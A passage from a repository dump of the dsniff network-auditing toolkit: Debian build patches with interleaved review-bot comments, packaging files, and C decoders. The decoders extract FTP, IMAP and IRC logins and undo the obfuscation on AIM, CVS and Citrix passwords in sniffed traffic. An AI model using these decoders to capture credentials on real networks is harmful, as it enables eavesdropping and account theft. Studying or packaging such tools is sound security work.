| CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" 19 | +CPPFLAGS = @CPPFLAGS@ 20 | LDFLAGS = @LDFLAGS@ 21 | 22 | PCAPINC = @PCAPINC@ 23 | 
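Review bot: in the 35_Add_CPPFLAGS.patch hunk at @@ -11,12 +11,13 @@, the change of `libdir` from `$(prefix)/share/dsniff` to `@libdir@` is not mentioned in the description, which only covers CPPFLAGS. `CFLAGS` bakes the value in through `-DDSNIFF_LIBDIR=\"$(libdir)/\"`, so this silently moves where the binaries look for their data files, and 37_fix-lib-and-share-dirs.patch later reverts it. Drop the `libdir` line from this patch so the series does not carry a change and its revert.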
@@ -37,7 +38,8 @@ 24 | X11INC = @X_CFLAGS@ 25 | X11LIB = @X_LIBS@ @X_PRE_LIBS@ -lXmu -lX11 @X_EXTRA_LIBS@ 26 | 27 | -INCS = -I. $(X11INC) -I$(srcdir)/missing 28 | +INCS = -I. $(NIDSINC) $(PCAPINC) $(LNETINC) $(DBINC) $(SSLINC) $(X11INC) \ 29 | + -I$(srcdir)/missing 30 | LIBS = @LIBS@ -L$(srcdir) -lmissing 31 | 32 | INSTALL = @INSTALL@ 33 | @@ -73,7 +75,7 @@ 34 | CONFIGS = dsniff.magic dsniff.services dnsspoof.hosts 35 | 36 | .c.o: 37 | - $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/$*.c 38 | + $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/$*.c 39 | 40 | all: $(PROGS) 41 | 42 | @@ -98,7 +100,7 @@ 43 | filesnarf.o: nfs_prot.h 44 | 45 | $(LIBOBJS): 46 | - $(CC) $(CFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 47 | + $(CC) $(CFLAGS) $(CPPFLAGS) $(INCS) -c $(srcdir)/missing/$*.c 48 | 49 | libmissing.a: $(LIBOBJS) 50 | ar -cr $@ $(LIBOBJS) 51 | -------------------------------------------------------------------------------- /debian/patches/36_implicit_declarations.patch: -------------------------------------------------------------------------------- 1 | Description: fix implicit declarations compiler warning 2 | * switch to C99 uint64_t, remove now unnecessary xdr_u_int64_t function 3 | * include missing string.h for memset 4 | Author: Lukas Schwaighofer 5 | 6 | --- a/filesnarf.c 7 | +++ b/filesnarf.c 8 | 
@@ -55,30 +55,6 @@ 9 | exit(1); 10 | } 11 | 12 | -/* XXX - for nfs_prot_xdr.c */ 13 | -bool_t 14 | -xdr_u_int64_t(XDR *xdrs, u_int64_t *nump) 15 | -{ 16 | - int i = 1; 17 | - u_char *p = (u_char *)nump; 18 | - 19 | - if (*(char *)&i == 1) { /* endian haack. */ 20 | - if (xdr_u_long(xdrs, (u_long *)(p + 4))) 21 | - return (xdr_u_long(xdrs, (u_long *)p)); 22 | - } 23 | - else { 24 | - if (xdr_u_long(xdrs, (u_long *)p)) 25 | - return (xdr_u_long(xdrs, (u_long *)(p + 4))); 26 | - } 27 | - return (FALSE); 28 | -} 29 | - 30 | -bool_t 31 | -xdr_int64_t(XDR *xdrs, int64_t *nump) 32 | -{ 33 | - return (xdr_u_int64_t(xdrs, (u_int64_t *)nump)); 34 | -} 35 | - 36 | static void 37 | fh_map_init(void) 38 | { 39 | --- a/nfs_prot.x 40 | +++ b/nfs_prot.x 41 | @@ -190,7 +190,7 @@ 42 | /* 43 | * Basic data types 44 | */ 45 | -typedef u_int64_t uint64; 46 | +typedef uint64_t uint64; 47 | typedef int64_t int64; 48 | typedef unsigned int uint32; 49 | typedef int int32; 50 | --- a/sshcrypto.c 51 | +++ b/sshcrypto.c 52 | @@ -20,6 +20,7 @@ 53 | #include 54 | #include 55 | #include 56 | +#include 57 | 58 | #include "sshcrypto.h" 59 | 60 | -------------------------------------------------------------------------------- /debian/patches/37_fix-lib-and-share-dirs.patch: -------------------------------------------------------------------------------- 1 | Description: Fix directory location for data files. They were wrongly set to lib dirs. 2 | Author: Hank Leininger 3 | 4 | --- a/Makefile.in 5 | +++ b/Makefile.in 6 | 
@@ -11,7 +11,7 @@ 7 | install_prefix = 8 | prefix = @prefix@ 9 | exec_prefix = @exec_prefix@ 10 | -libdir = @libdir@ 11 | +libdir = $(prefix)/share/dsniff 12 | sbindir = @sbindir@ 13 | mandir = @mandir@ 14 | 15 | -------------------------------------------------------------------------------- /debian/patches/38_fix-pcap_init.patch: -------------------------------------------------------------------------------- 1 | Description: Resolve naming collision due to libpcap API changes 2 | dsniff was written with a function named pcap_init() that predates 3 | the one in libpcap and is entirely different. This patch renames it 4 | out of the way. 5 | Author: Dennis Filder 6 | Bug-Debian: https://bugs.debian.org/980588 7 | Last-Update: 2021-02-10 8 | --- 9 | --- a/tcpnice.c 10 | +++ b/tcpnice.c 11 | @@ -204,7 +204,7 @@ 12 | 13 | filter = copy_argv(argv); 14 | 15 | - if ((pd = pcap_init(intf, filter, 128)) == NULL) 16 | + if ((pd = pcap_init_dsniff(intf, filter, 128)) == NULL) 17 | errx(1, "couldn't initialize sniffing"); 18 | 19 | if ((pcap_off = pcap_dloff(pd)) < 0) 20 | --- a/dnsspoof.c 21 | +++ b/dnsspoof.c 22 | @@ -309,7 +309,7 @@ 23 | else snprintf(buf, sizeof(buf), "udp dst port 53 and not src %s", 24 | libnet_addr2name4(lnet_ip, LIBNET_DONT_RESOLVE)); 25 | 26 | - if ((pcap_pd = pcap_init(dev, buf, 128)) == NULL) 27 | + if ((pcap_pd = pcap_init_dsniff(dev, buf, 128)) == NULL) 28 | errx(1, "couldn't initialize sniffing"); 29 | 30 | if ((pcap_off = pcap_dloff(pcap_pd)) < 0) 31 | --- a/pcaputil.h 32 | +++ b/pcaputil.h 33 | @@ -11,7 +11,7 @@ 34 | #ifndef PCAPUTIL_H 35 | #define PCAPUTIL_H 36 | 37 | -pcap_t *pcap_init(char *intf, char *filter, int snaplen); 38 | +pcap_t *pcap_init_dsniff(char *intf, char *filter, int snaplen); 39 | 40 | int pcap_dloff(pcap_t *pd); 41 | 42 | --- a/tcpkill.c 43 | +++ b/tcpkill.c 44 | 
@@ -130,7 +130,7 @@ 45 | 46 | filter = copy_argv(argv); 47 | 48 | - if ((pd = pcap_init(intf, filter, 64)) == NULL) 49 | + if ((pd = pcap_init_dsniff(intf, filter, 64)) == NULL) 50 | errx(1, "couldn't initialize sniffing"); 51 | 52 | if ((pcap_off = pcap_dloff(pd)) < 0) 53 | --- a/pcaputil.c 54 | +++ b/pcaputil.c 55 | @@ -63,7 +63,7 @@ 56 | } 57 | 58 | pcap_t * 59 | -pcap_init(char *intf, char *filter, int snaplen) 60 | +pcap_init_dsniff(char *intf, char *filter, int snaplen) 61 | { 62 | pcap_t *pd; 63 | u_int net, mask; 64 | -------------------------------------------------------------------------------- /debian/patches/39_libtirpc.patch: -------------------------------------------------------------------------------- 1 | Author: Robert Scheck 2 | Description: allows building against libtirpc (as a separate library) given the Sun RPC 3 | support in glibc has been deprecated for a long time. 4 | 5 | --- a/Makefile.in 6 | +++ b/Makefile.in 7 | @@ -16,7 +16,7 @@ 8 | mandir = @mandir@ 9 | 10 | CC = @CC@ 11 | -CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" 12 | +CFLAGS = @CFLAGS@ -DDSNIFF_LIBDIR=\"$(libdir)/\" -I/usr/include/tirpc 13 | CPPFLAGS = @CPPFLAGS@ 14 | LDFLAGS = @LDFLAGS@ 15 | 16 | @@ -107,7 +107,7 @@ 17 | $(RANLIB) $@ 18 | 19 | dsniff: $(HDRS) $(SRCS) $(OBJS) libmissing.a 20 | - $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) 21 | + $(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 22 | 23 | arpspoof: arpspoof.o arp.o libmissing.a 24 | $(CC) $(LDFLAGS) -o $@ arpspoof.o arp.o $(LIBS) $(PCAPLIB) $(LNETLIB) 25 | 
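Review bot: in the 39_libtirpc.patch hunk at @@ -16,7 +16,7 @@, `-I/usr/include/tirpc` is hardcoded into `CFLAGS`. It is a preprocessor search path, so it belongs with `CPPFLAGS` or `INCS`, and the location should come from configure or `pkg-config --cflags libtirpc` rather than a fixed path. debian/rules already appends the same directory through `DEB_CFLAGS_MAINT_APPEND`, so the Debian build ends up with it twice.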
@@ -116,7 +116,7 @@ 26 | $(CC) $(LDFLAGS) -o $@ dnsspoof.o pcaputil.o $(LIBS) $(PCAPLIB) $(LNETLIB) 27 | 28 | filesnarf: nfs_prot.o filesnarf.o pcaputil.o rpc.o libmissing.a 29 | - $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 30 | + $(CC) $(LDFLAGS) -o $@ filesnarf.o nfs_prot.o pcaputil.o rpc.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) -ltirpc 31 | 32 | macof: macof.o libmissing.a 33 | $(CC) $(LDFLAGS) -o $@ macof.o $(LIBS) $(PCAPLIB) $(LNETLIB) 34 | @@ -128,7 +128,7 @@ 35 | $(CC) $(LDFLAGS) -o $@ msgsnarf.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 36 | 37 | sshmitm: sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o libmissing.a 38 | - $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 39 | + $(CC) $(LDFLAGS) -o $@ sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 40 | 41 | sshow: sshow.o pcaputil.o libmissing.a 42 | $(CC) $(LDFLAGS) -o $@ sshow.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 43 | 
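Review bot: in the hunk at @@ -128,7 +128,7 @@, `-ltirpc` is added to the sshmitm link line although its objects are `sshmitm.o buf.o hex.o record.o ssh.o sshcrypto.o`, with no `rpc.o` or `nfs_prot.o` among them; the webmitm hunk that follows does the same. Unless these programs use XDR or RPC symbols that the object lists do not show, limit `-ltirpc` to the targets that link RPC code, such as filesnarf, to avoid a needless runtime dependency.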
@@ -146,7 +146,7 @@ 44 | $(CC) $(LDFLAGS) -o $@ urlsnarf.o base64.o buf.o pcaputil.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) 45 | 46 | webmitm: webmitm.o base64.o buf.o decode_http.o record.o libmissing.a 47 | - $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) 48 | + $(CC) $(LDFLAGS) -o $@ webmitm.o base64.o buf.o decode_http.o record.o $(LIBS) $(LNETLIB) $(DBLIB) $(SSLLIB) -ltirpc 49 | 50 | webspy: webspy.o base64.o buf.o remote.o libmissing.a 51 | $(CC) $(LDFLAGS) -o $@ webspy.o base64.o buf.o remote.o $(LIBS) $(NIDSLIB) $(PCAPLIB) $(LNETLIB) $(X11LIB) 52 | -------------------------------------------------------------------------------- /debian/patches/series: -------------------------------------------------------------------------------- 1 | 01_time.h.patch 2 | 02_mailsnarf_corrupt.patch 3 | 03_pcap_read_dump.patch 4 | 04_multiple_intf.patch 5 | 05_amd64_fix.patch 6 | 06_urlsnarf_zeropad.patch 7 | 07_libnet_1.1.patch 8 | 08_openssl-0.9.8.patch 9 | 09_sysconf_clocks.patch 10 | 10_urlsnarf_escape.patch 11 | 11_string_header.patch 12 | 12_arpa_inet_header.patch 13 | 13_pop_with_version.patch 14 | 14_obsolete_time.patch 15 | 15_checksum_libnids.patch 16 | 16_TDS_decoder.patch 17 | 17_checksum.patch 18 | 18_sshcrypto.patch 19 | 19_rewrite-and-modernize-POP-decoder.patch 20 | 20_debian_dirs.patch 21 | 21_msgsnarf_segfault.patch 22 | 22_handlepp.patch 23 | 23_urlsnarf_timestamp.patch 24 | 24_Fix-OpenSSL1.1.0-Build.patch 25 | 25_fix-spelling-errors.patch 26 | 26_arpspoof-add-r-switch-to-poison-both-directions.patch 27 | 27_arpspoof-allow-use-of-of-multiple-targets.patch 28 | 28_arpspoof-allow-selection-of-source-hw-address.patch 29 | 29_libnet_name2addr4.patch 30 | 30_pntohl_shift.patch 31 | 31_sysconf_clocks.patch 32 | 32_rpc_segfault.patch 33 | 33_sshcrypto_DES.patch 34 | 34_fix-parallel-FTBFS.patch 35 | 35_Add_CPPFLAGS.patch 36 | 36_implicit_declarations.patch 37 | 37_fix-lib-and-share-dirs.patch 38 | 
38_fix-pcap_init.patch 39 | 39_libtirpc.patch 40 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | export DEB_BUILD_MAINT_OPTIONS = hardening=+all 4 | export DEB_CFLAGS_MAINT_APPEND = -I/usr/include/tirpc/ 5 | export DEB_LDFLAGS_MAINT_APPEND = -ltirpc 6 | %: 7 | dh $@ 8 | 9 | override_dh_auto_install: 10 | # prefix is hardcoded in Makefile.in 11 | dh_auto_install -- prefix=debian/dsniff/usr 12 | -------------------------------------------------------------------------------- /debian/salsa-ci.yml: -------------------------------------------------------------------------------- 1 | --- 2 | include: 3 | - https://salsa.debian.org/salsa-ci-team/pipeline/raw/master/salsa-ci.yml 4 | - https://salsa.debian.org/salsa-ci-team/pipeline/raw/master/pipeline-jobs.yml 5 | -------------------------------------------------------------------------------- /debian/source/format: -------------------------------------------------------------------------------- 1 | 3.0 (quilt) 2 | -------------------------------------------------------------------------------- /debian/watch: -------------------------------------------------------------------------------- 1 | version=4 2 | opts="dversionmangle=s/.debian//" \ 3 | https://www.monkey.org/~dugsong/dsniff/beta/dsniff-(.+)\.tar\.gz 4 | 5 | 6 | -------------------------------------------------------------------------------- /decode_aim.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_aim.c 3 | * 4 | * AOL Instant Messenger (and ICQ2000). 
5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_aim.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | 19 | #include "hex.h" 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | struct flap { 24 | u_char start; 25 | u_char channel; 26 | u_short seqnum; 27 | u_short datalen; 28 | }; 29 | 30 | static char *aim_xor1 = "Tic/Toc"; 31 | 32 | static u_char aim_xor2[] = { 33 | 0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 34 | 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c 35 | }; 36 | 37 | int 38 | decode_aim(u_char *buf, int len, u_char *obuf, int olen) 39 | { 40 | struct buf *msg, inbuf, outbuf; 41 | struct flap *flap; 42 | u_char c, *p; 43 | int i, j; 44 | 45 | buf_init(&inbuf, buf, len); 46 | buf_init(&outbuf, obuf, olen); 47 | 48 | if (buf_cmp(&inbuf, "FLAPON\r\n\r\n", 10) == 0) 49 | buf_skip(&inbuf, 10); 50 | 51 | while (buf_len(&inbuf) > sizeof(*flap)) { 52 | flap = (struct flap *)buf_ptr(&inbuf); 53 | flap->datalen = ntohs(flap->datalen); 54 | 55 | i = sizeof(*flap) + flap->datalen; 56 | 57 | if ((msg = buf_tok(&inbuf, NULL, i)) == NULL) 58 | break; 59 | 60 | buf_skip(msg, sizeof(*flap)); 61 | 62 | if (buf_cmp(msg, "toc_signon ", 11) == 0) { 63 | msg->base[msg->end - 1] = '\0'; 64 | p = buf_ptr(msg); 65 | 66 | for (i = 0; i < 4; i++) { 67 | if ((j = strcspn(p, " ")) > 0) 68 | p += (j + 1); 69 | } 70 | if (strtok(p, " ") == NULL) 71 | continue; 72 | 73 | buf_putf(&outbuf, "%s ", buf_ptr(msg)); 74 | 75 | i = strlen(p); 76 | j = hex_decode(p, i, p, i); 77 | 78 | for (i = 0; i < j; i++) 79 | p[i] = p[i] ^ aim_xor1[i % 7]; 80 | p[i] = '\0'; 81 | 82 | buf_putf(&outbuf, "[%s]\n", p); 83 | } 84 | else if (flap->start == 0x2a && flap->channel == 0x01 && 85 | buf_cmp(msg, "\x00\x00\x00\x01", 4) == 0) { 86 | buf_skip(msg, 7); 87 | 88 | buf_get(msg, &c, 1); 89 | p = buf_ptr(msg); 90 | 91 | if (c == 0 || buf_skip(msg, c + 3) < 0) 92 | continue; 93 | 94 | 
p[c] = '\0'; 95 | 96 | buf_get(msg, &c, 1); 97 | 98 | if (buf_len(msg) < c + 1) 99 | continue; 100 | 101 | buf_putf(&outbuf, "%s\n", p); 102 | 103 | p = buf_ptr(msg); 104 | 105 | for (i = 0; i < c; i++) { 106 | p[i] = p[i] ^ aim_xor2[i % sizeof(aim_xor2)]; 107 | } 108 | p[i] = '\0'; 109 | 110 | buf_putf(&outbuf, "%s\n", p); 111 | 112 | break; 113 | } 114 | } 115 | buf_end(&outbuf); 116 | 117 | return (buf_len(&outbuf)); 118 | } 119 | -------------------------------------------------------------------------------- /decode_citrix.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_citrix.c 3 | * 4 | * Citrix ICA. 5 | * 6 | * http://www.securityfocus.com/templates/archive.pike?list=1&date=200 \ 7 | * 0-04-15&msg=Pine.BSO.4.20.0003290949280.2640-100000@naughty.monkey.org 8 | * 9 | * Thanks to Jeremie Kass for providing me with 10 | * traffic traces. 11 | * 12 | * Copyright (c) 2000 Dug Song 13 | * 14 | * $Id: decode_citrix.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 15 | */ 16 | 17 | #include "config.h" 18 | 19 | #include 20 | 21 | #include 22 | #include 23 | 24 | #include "buf.h" 25 | #include "decode.h" 26 | 27 | static u_char ica_magic[] = { 0x32, 0x26, 0x85, 0x92, 0x58 }; 28 | 29 | int 30 | decode_citrix(u_char *buf, int len, u_char *obuf, int olen) 31 | { 32 | struct buf inbuf, outbuf; 33 | u_char key, c, t[2]; 34 | int i; 35 | 36 | buf_init(&inbuf, buf, len); 37 | buf_init(&outbuf, obuf, olen); 38 | 39 | while ((i = buf_index(&inbuf, ica_magic, sizeof(ica_magic))) >= 0) { 40 | buf_skip(&inbuf, i); 41 | 42 | if (buf_len(&inbuf) < 60) 43 | break; 44 | 45 | buf_skip(&inbuf, 17); 46 | 47 | if (buf_get(&inbuf, &key, 1) != 1) 48 | break; 49 | 50 | buf_skip(&inbuf, 42); 51 | 52 | if (buf_get(&inbuf, &c, 1) != 1) 53 | break; 54 | 55 | c ^= ('C' | key); 56 | 57 | buf_put(&outbuf, &c, 1); 58 | 59 | i = 0; 60 | while (buf_get(&inbuf, t, 2) == 2) { 61 | c = t[0] ^ t[1] ^ key; 62 | 63 | if (c == '\0') { 64 | buf_put(&outbuf, 
"\n", 1); 65 | if (++i > 2) break; 66 | } 67 | buf_put(&outbuf, &c, 1); 68 | } 69 | } 70 | buf_end(&outbuf); 71 | 72 | return (buf_len(&outbuf)); 73 | } 74 | -------------------------------------------------------------------------------- /decode_cvs.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_cvs.c 3 | * 4 | * Concurrent Versions System. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_cvs.c,v 1.6 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | #include "buf.h" 18 | #include "decode.h" 19 | 20 | /* stolen from CVS scramble.c */ 21 | static u_char cvs_shifts[] = { 22 | 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 23 | 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 24 | 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 25 | 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 26 | 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 27 | 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 28 | 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 29 | 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 30 | 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 31 | 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 32 | 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 33 | 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 34 | 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 35 | 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 36 | 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 37 | 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 38 | }; 39 | 40 | int 41 | decode_cvs(u_char *buf, int len, u_char *obuf, int olen) 42 | { 43 | struct buf *line, inbuf, outbuf; 44 | u_char *p; 45 | int i, n; 46 | 47 | 
buf_init(&inbuf, buf, len); 48 | buf_init(&outbuf, obuf, olen); 49 | 50 | if (buf_cmp(&inbuf, "BEGIN ", 6) != 0) 51 | return (0); 52 | 53 | for (n = 0; n < 5 && (i = buf_index(&inbuf, "\n", 1)) != -1; n++) { 54 | line = buf_tok(&inbuf, NULL, i + 1); 55 | line->base[line->end - 1] = '\0'; 56 | 57 | p = buf_ptr(line); 58 | buf_putf(&outbuf, "%s", p); 59 | 60 | if (n == 3) { 61 | if (p[0] != 'A') 62 | return (0); 63 | 64 | for (i = 1; i < sizeof(cvs_shifts) - 1 && p[i]; i++) 65 | p[i] = cvs_shifts[p[i]]; 66 | 67 | buf_putf(&outbuf, " [%s]", p + 1); 68 | } 69 | buf_put(&outbuf, "\n", 1); 70 | } 71 | buf_end(&outbuf); 72 | 73 | return (buf_len(&outbuf)); 74 | } 75 | 76 | -------------------------------------------------------------------------------- /decode_ftp.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_ftp.c 3 | * 4 | * File Transfer Protocol. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_ftp.c,v 1.7 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "options.h" 19 | #include "buf.h" 20 | #include "decode.h" 21 | 22 | extern struct _dc_meta dc_meta; 23 | 24 | int 25 | decode_ftp(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | struct buf *line, inbuf, outbuf; 28 | int i, n; 29 | 30 | if ((len = strip_telopts(buf, len)) == 0) 31 | return (0); 32 | 33 | buf_init(&inbuf, buf, len); 34 | buf_init(&outbuf, obuf, olen); 35 | 36 | if (!buf_isascii(&inbuf)) 37 | return (0); 38 | 39 | n = 0; 40 | 41 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 42 | line = buf_tok(&inbuf, NULL, i); 43 | buf_skip(&inbuf, 1); 44 | 45 | if (i > 0 && line->base[i - 1] == '\r') 46 | line->end--; 47 | line->base[line->end] = '\0'; 48 | 49 | if (strncasecmp(buf_ptr(line), "USER ", 5) == 0 || 50 | strncasecmp(buf_ptr(line), "ACCT ", 5) == 0 || 51 | strncasecmp(buf_ptr(line), "PASS ", 5) == 0) { 52 | buf_putf(&outbuf, 
"%s\n", buf_ptr(line)); 53 | dc_meta.is_hot = 1; 54 | n++; 55 | } 56 | } 57 | if (n < 2) return (0); 58 | 59 | buf_end(&outbuf); 60 | 61 | return (buf_len(&outbuf)); 62 | } 63 | 64 | -------------------------------------------------------------------------------- /decode_hex.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_hex.c 3 | * 4 | * Hex dump, for debugging. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_hex.c,v 1.5 2001/03/15 08:32:59 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | #include 15 | 16 | #include 17 | #include 18 | #include 19 | 20 | #include "buf.h" 21 | #include "decode.h" 22 | 23 | /* adapted from OpenBSD tcpdump: dump the buffer in emacs-hexl format */ 24 | 25 | int 26 | decode_hex(u_char *buf, int len, u_char *obuf, int olen) 27 | { 28 | struct buf inbuf, outbuf; 29 | u_int i, j, k; 30 | u_char c; 31 | 32 | buf_init(&inbuf, buf, len); 33 | buf_init(&outbuf, obuf, olen); 34 | 35 | while ((i = buf_len(&inbuf)) > 0) { 36 | i = i < 16 ? i : 16; 37 | k = buf_tell(&inbuf); 38 | 39 | buf_putf(&outbuf, " %04x: ", k); 40 | 41 | for (j = 0; j < i; j++) { 42 | buf_get(&inbuf, &c, 1); 43 | buf_putf(&outbuf, "%02x", (u_int)c); 44 | if ((j % 2) == 1) 45 | buf_put(&outbuf, " ", 1); 46 | } 47 | for (; j < 16; j++) { 48 | buf_put(&outbuf, " ", (j % 2) + 2); 49 | } 50 | buf_put(&outbuf, " ", 1); 51 | 52 | buf_seek(&inbuf, k, SEEK_SET); 53 | 54 | for (j = 0; j < i; j++) { 55 | buf_get(&inbuf, &c, 1); 56 | c = isprint(c) ? c : '.'; 57 | buf_putf(&outbuf, "%c", c); 58 | } 59 | buf_put(&outbuf, "\n", 1); 60 | } 61 | buf_end(&outbuf); 62 | 63 | return (buf_len(&outbuf)); 64 | } 65 | -------------------------------------------------------------------------------- /decode_imap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_imap.c 3 | * 4 | * Internet Mail Access Protocol. 
5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_imap.c,v 1.5 2001/03/15 08:33:00 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "base64.h" 19 | #include "decode.h" 20 | #include "buf.h" 21 | 22 | extern struct _dc_meta dc_meta; 23 | 24 | int 25 | decode_imap(u_char *buf, int len, u_char *obuf, int olen) 26 | { 27 | char *p; 28 | char *ptr; 29 | int need_more = 0; 30 | enum { 31 | NONE, 32 | AUTHPLAIN, 33 | AUTHMULTI, 34 | USERPASS 35 | } mode = NONE; 36 | 37 | obuf[0] = '\0'; 38 | 39 | for (p = strtok(buf, "\r\n"); p != NULL; p = strtok(NULL, "\r\n")) { 40 | if (need_more == 0) { 41 | // skip ID 42 | if ((ptr = strchr(p, ' ')) == NULL) 43 | break; 44 | p = ++ptr; 45 | } 46 | 47 | if (mode == NONE) { 48 | if (strncasecmp(p, "AUTHENTICATE PLAIN", 18) == 0) { 49 | mode = AUTHPLAIN; 50 | need_more = 1; 51 | continue; 52 | } else if ((strncasecmp(p, "AUTHENTICATE ", 13) == 0) || (strncasecmp(p, "LOGIN {", 7) == 0)) { 53 | strlcat(obuf, p, olen); 54 | mode = AUTHMULTI; 55 | need_more = 2; 56 | continue; 57 | } else if (strncasecmp(p, "LOGIN ", 6) == 0) { 58 | mode = USERPASS; // FALL-THROUGH. 
59 | } else 60 | continue; 61 | } 62 | 63 | if (mode == USERPASS) { 64 | snprintf(obuf, olen, "%s\n", p + 6 /* 'LOGIN '*/); 65 | break; 66 | } 67 | 68 | if (mode == AUTHPLAIN) { 69 | char *u , *pass; 70 | if (decode_authplain(p, &u, &pass) != 0) 71 | break; 72 | snprintf(obuf, olen, "%s %s\n", u, pass); 73 | break; 74 | } 75 | 76 | if (need_more > 0) { 77 | need_more--; 78 | strlcat(obuf, p, olen); 79 | if (need_more > 0) 80 | continue; 81 | strlcat(obuf, "\n", olen); 82 | break; 83 | } 84 | break; 85 | } 86 | 87 | if (obuf[0] == '\0') 88 | return 0; 89 | 90 | dc_meta.is_hot = 1; 91 | return (strlen(obuf)); 92 | } 93 | -------------------------------------------------------------------------------- /decode_irc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_irc.c 3 | * 4 | * Internet Relay Chat. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: decode_irc.c,v 1.6 2001/03/15 08:33:01 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | 18 | #include "buf.h" 19 | #include "decode.h" 20 | 21 | int 22 | decode_irc(u_char *buf, int len, u_char *obuf, int olen) 23 | { 24 | struct buf *line, inbuf, outbuf; 25 | int i, got_auth; 26 | 27 | buf_init(&inbuf, buf, len); 28 | buf_init(&outbuf, obuf, olen); 29 | got_auth = 0; 30 | 31 | while ((i = buf_index(&inbuf, "\n", 1)) != -1) { 32 | line = buf_tok(&inbuf, NULL, i); 33 | buf_skip(&inbuf, 1); 34 | 35 | if (i > 0 && line->base[i - 1] == '\r') 36 | line->end--; 37 | line->base[line->end] = '\0'; 38 | 39 | if (buf_cmp(&inbuf, ";", 1) == 0) { 40 | if ((i = buf_index(line, " ", 1)) < 0) 41 | continue; 42 | buf_skip(line, i + 1); 43 | } 44 | if (buf_cmp(line, "USER ", 5) == 0 || 45 | buf_cmp(line, "NICK ", 5) == 0) { 46 | buf_rewind(line); 47 | buf_putf(&outbuf, "%s\n", buf_ptr(line)); 48 | } 49 | else if (buf_cmp(line, "PASS ", 5) == 0 || 50 | buf_cmp(line, "OPER ", 5) == 0) { 51 | buf_rewind(line); 52 | 
			buf_putf(&outbuf, "%s\n", buf_ptr(line));
			got_auth = 1;
		}
